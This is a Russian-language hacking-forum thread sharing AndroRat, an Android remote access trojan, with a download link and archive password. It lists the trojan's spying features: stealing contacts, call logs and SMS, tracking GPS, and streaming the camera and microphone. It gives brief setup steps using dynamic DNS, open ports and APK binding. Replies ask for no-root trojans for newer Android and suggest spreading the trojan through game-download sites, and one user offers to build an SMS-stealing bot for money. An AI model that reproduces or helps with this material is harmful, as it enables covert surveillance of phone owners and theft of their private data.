• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

После регистрации будут доступны основные разделы.

Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

RAT на Android

Jesse

Участник
Реакции
54
0 руб.
AndroRat
Олдовый, баянистый, но рабочий паблик ратник на андроид.

a27894d88491.png

1374939281_androrat-1.png

Получить список контактов и всю информацию о них;
Получить журналы вызовов;
Получить все сообщения;
Получить текущее местоположение по GPS;
Мониторинг входящих сообщений в реальном времени;
Мониторинг состояния телефона в реальном времени (входящие звонки, пропущенные звонки и т.д.);
Захват изображения с камеры;
Стриминг звука с микрофона (или с другого источника);
Стриминг видео с камеры;
Отправить СМС-сообщение;
Сделать вызов;
Открыть URL в стандартном браузере;
Заставить телефон завибрировать.

1. Создаем DDNS от no-ip
2. Скачиваем DDNS-клиент от no-ip
3. Открываем порты
4. Биндим APK
5. Наслаждаемся

VT1
VT2
VT3

СКАЧАТЬ
пасс:vlmi

Последнее редактирование:

SVirusS

Новичок
Реакции
0
0 руб.
Кто может разжевать по полочкам? Что именно тут делать? а то я не понял
1. Создаем DDNS от no-ip
2. Скачиваем DDNS-клиент от no-ip
3. Открываем порты
4. Биндим APK
5. Наслаждаемся

BPOH

Участник
Реакции
19
0 руб.
Уита не актуальная работающая только под рут на версиях андроид 4.3. Выше уже не работает...
Может кто простенький троянец на 6+ ведроид видел в паблике?

Morris

Эксперт
Реакции
557
0 руб.
Telegram
Желательно бы найти на ведро от 5 и выше, очень надо, может есть у кого ребят? Что бы без рут прав пахал

Cataclismo

Тыжпрограммист

Cataclismo

Тыжпрограммист
Резидент
Реакции
478
0 руб.
Telegram
Ещё бы понять, как это чудо распространять. Не думаю, что кто-то согласится качать софт не из Play Market'a к тому же по умолчанию в Андрюхе стоит защита на запуск от неизвестных источников...

Tusken

Участник
Реакции
12
0 руб.
Ещё бы понять, как это чудо распространять. Не думаю, что кто-то согласится качать софт не из Play Market'a к тому же по умолчанию в Андрюхе стоит защита на запуск от неизвестных источников...
Распространять на таких сайтах как spaces ,у тех кто от туда ставит игры и прочее по умолчанию сразу после покупки нового телефона все защиты отключены да и рут получен.

Cataclismo

Тыжпрограммист

Cataclismo

Тыжпрограммист
Резидент
Реакции
478
0 руб.
Telegram
Распространять на таких сайтах как spaces ,у тех кто от туда ставит игры и прочее по умолчанию сразу после покупки нового телефона все защиты отключены да и рут получен.

Хмм, стоит попробовать

BPOH

Участник
Реакции
19
0 руб.
Распространять дело сотое... билд не подкинете с простеньким функционалом чтоб без рута работал, буду крайне благодарен!

qwertykon

Участник
Реакции
6
0 руб.
Обычно наоборот включены. На Xiaomi вообще рут получить крайне заморочено.

FoxMen

Участник
Реакции
26
0 руб.
Please note, if you want to make a deal with this user, that it is blocked.
Могу на заказ сделать Андроид бота (паблик) за 300руб ))
ворует смс
отправляет смс

Tusken

Участник
Реакции
12
0 руб.
Обычно наоборот включены. На Xiaomi вообще рут получить крайне заморочено.
Я про то ,что пользователи которые качают от туда сразу отключают ве защиты ,иначе поставить какой либо софт в 50% будет нельзя . Не знаю ,как на Xiaomi но на все телефоны которые были у меня (Philips, Lenovo, Samsung и Sony) все получалось за 5 минут . Исключением был Philips v 387 ,пришлось перепрошить поганца ,ни как не хотел отдать рут.

Сверху Снизу